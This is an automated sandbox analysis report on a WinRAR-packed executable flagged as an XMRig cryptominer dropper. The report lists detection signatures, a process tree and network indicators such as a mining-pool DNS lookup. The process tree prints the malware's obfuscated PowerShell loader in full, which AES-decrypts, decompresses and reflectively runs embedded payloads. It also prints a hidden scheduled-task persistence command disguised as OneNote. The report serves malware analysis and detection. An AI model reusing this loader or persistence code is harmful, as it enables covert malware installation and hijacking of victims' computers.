Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1428499
MD5:6d075d047098d57266aa59b97d288bda
SHA1:1cb3eabf3ddbf47ea0f9eebac64b6689f7645cc1
SHA256:fabd087044389ec6e9d7e11f59687c9527e0aec25a83f8dae30da8404efe0e39
Tags:exe

Detection

Xmrig
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Xmrig cryptocurrency miner
Loading BitLocker PowerShell Module
Suspicious powershell command line found
Very long command line found
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6D075D047098D57266AA59B97D288BDA)
    • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\mhk.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7652 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\mhk.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj 
([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7788 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 7888 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\mhk') MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 4428 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 4076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7180 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 7800 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network64476Man.cmd';$Rtyv='RezYkvadzYkvLizYkvneszYkv'.Replace('zYkv', ''),'ETUMknTUMktrTUMkyPoTUMkiTUMknTUMktTUMk'.Replace('TUMk', ''),'CrigeoeaigeoteigeoDigeoecigeorypigeotoigeorigeo'.Replace('igeo', ''),'TghdlranghdlsghdlfghdloghdlrmghdlFighdlnalghdlBghdlloghdlckghdl'.Replace('ghdl', ''),'GGYNueGYNutGYNuCuGYNurrGYNuenGYNutPGYNurGYNuoceGYNusGYNusGYNu'.Replace('GYNu', ''),'LoalBOkdlBOk'.Replace('lBOk', ''),'ElROFDeROFDmeROFDntAROFDtROFD'.Replace('ROFD', ''),'Shhcaplihhcathhca'.Replace('hhca', ''),'FrolQelmBlQelalQelslQelelQel6lQel4lQelStlQelrinlQelglQel'.Replace('lQel', ''),'MkRoPainkRoPMkRoPodkRoPukRoPlekRoP'.Replace('kRoP', ''),'CoCPyCpyTCPyCoCPyC'.Replace('CPyC', ''),'DecwUeRowUeRmprwUeReswUeRswUeR'.Replace('wUeR', ''),'ChqcmhahqcmnhqcmgeEhqcmxthqcmenshqcmiohqcmnhqcm'.Replace('hqcm', ''),'Inpsjavopsjakpsjaepsja'.Replace('psja', '');powershell -w hidden;function tNioj($ePEhV){$iYroy=[System.Security.Cryptography.Aes]::Create();$iYroy.Mode=[System.Security.Cryptography.CipherMode]::CBC;$iYroy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$iYroy.Key=[System.Convert]::($Rtyv[8])('SAaw/5aaxUAhEMFj4gdvF4EfnK5mel+MrvInWCktw5A=');$iYroy.IV=[System.Convert]::($Rtyv[8])('5qReXrx1Mz3EZX5V7wyNKQ==');$VcojP=$iYroy.($Rtyv[2])();$VYqzB=$VcojP.($Rtyv[3])($ePEhV,0,$ePEhV.Length);$VcojP.Dispose();$iYroy.Dispose();$VYqzB;}function uMMXI($ePEhV){$vtWcn=New-Object System.IO.MemoryStream(,$ePEhV);$wwnvp=New-Object System.IO.MemoryStream;$Guujf=New-Object System.IO.Compression.GZipStream($vtWcn,[IO.Compression.CompressionMode]::($Rtyv[11]));$Guujf.($Rtyv[10])($wwnvp);$Guujf.Dispose();$vtWcn.Dispose();$wwnvp.Dispose();$wwnvp.ToArray();}$sQMZI=[System.IO.File]::($Rtyv[0])([Console]::Title);$FEXOj=uMMXI (tNioj ([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 5).Substring(2))));$SgTUK=uMMXI (tNioj 
([Convert]::($Rtyv[8])([System.Linq.Enumerable]::($Rtyv[6])($sQMZI, 6).Substring(2))));[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$SgTUK).($Rtyv[1]).($Rtyv[13])($null,$null);[System.Reflection.Assembly]::($Rtyv[5])([byte[]]$FEXOj).($Rtyv[1]).($Rtyv[13])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • powershell.exe (PID: 7792 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 8084 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
                • powershell.exe (PID: 1228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man') MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 6700 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 7560 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network64476Man.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: sslproxydump.pcap
Rule: JoeSecurity_Xmrig
Description: Yara detected Xmrig cryptocurrency miner
Author: Joe Security
Strings: (none)

    System Summary

    Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Network64476Man.cmd
    Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\mhk.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7660, ProcessName: powershell.exe
    Timestamp:04/19/24-03:21:07.355283
    SID:2036289
    Source Port:57977
    Destination Port:53
    Protocol:UDP
    Classtype:A Network Trojan was detected

    AV Detection

    Source: http://pesterbdd.com/images/Pester.png, URL Reputation: Label: malware
    Source: file.exe, ReversingLabs: Detection: 21%

    Bitcoin Miner

    Source: Yara match, File source: sslproxydump.pcap, type: PCAP
    Source: file.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbq source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbR source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBM source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbF source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb2 source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb$ source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1765118329.00000217EC74D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB" source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000017.00000002.2234383785.000001DF2EFF5000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb| source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000017.00000002.2234254487.000001DF2EFE0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb; source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb7 source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdbS source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: n.pdbM source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: Microsoft.Powershell.PSReadline.pdbI source: powershell.exe, 00000007.00000002.1766230269.00000217EC93C000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdb source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbjS source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
    Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000007.00000002.1763356691.00000217EA796000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Core.pdbk source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.1766480519.00000217EC9EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2234383785.000001DF2EFE7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdbpdbW source: powershell.exe, 00000017.00000002.2235374094.000001DF2F023000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdbF source: powershell.exe, 00000017.00000002.2234695420.000001DF2EFFB000.00000004.00000020.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF65A36407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF65A36407C
    Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF65A37B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF65A37B110
    Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00007FF65A38FC20 FindFirstFileExA, 0_2_00007FF65A38FC20

    Networking

    Source: Traffic, Snort IDS: 2036289 ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro) 192.168.2.4:57977 -> 1.1.1.1:53
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown, DNS traffic detected: queries for: pool.hashvault.pro
    Source: powershell.exe, 00000017.00000002.2153655366.000001DF16876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000008.00000002.1839958983.0000024098D98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftr
    Source: powershell.exe, 00000007.00000002.1760886154.00000217901C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1745848773.00000217803E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1760886154.00000217900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151FB2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 00000007.00000002.1745848773.00000217819D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000007.00000002.1766480519.00000217EC994000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1938585602.00000240B2E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
    Source: powershell.exe, 00000008.00000002.1940934137.00000240B2EEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co0
    Source: powershell.exe, 00000018.00000002.2558198678.000001EBD2EE3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coQ
    Source: powershell.exe, 0000001B.00000002.2623470775.0000013D002DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka..winsvr
    Source: powershell.exe, 00000007.00000002.1745848773.0000021780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1843952409.000002409A8C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1977549931.000002151F971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2154093545.000001DF16EAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBA7C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.2630221027.0000013D00441000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: powershell.exe, 0000001B.00000002.2630221027.0000013D005FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
    Source: powershell.exe, 00000018.00000002.2316867721.000001EBBB5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.2316867721.000001EBBB5AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000008.00000002.1928032545.00000240AA935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000008.00000002.1843952409.000002409AAEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
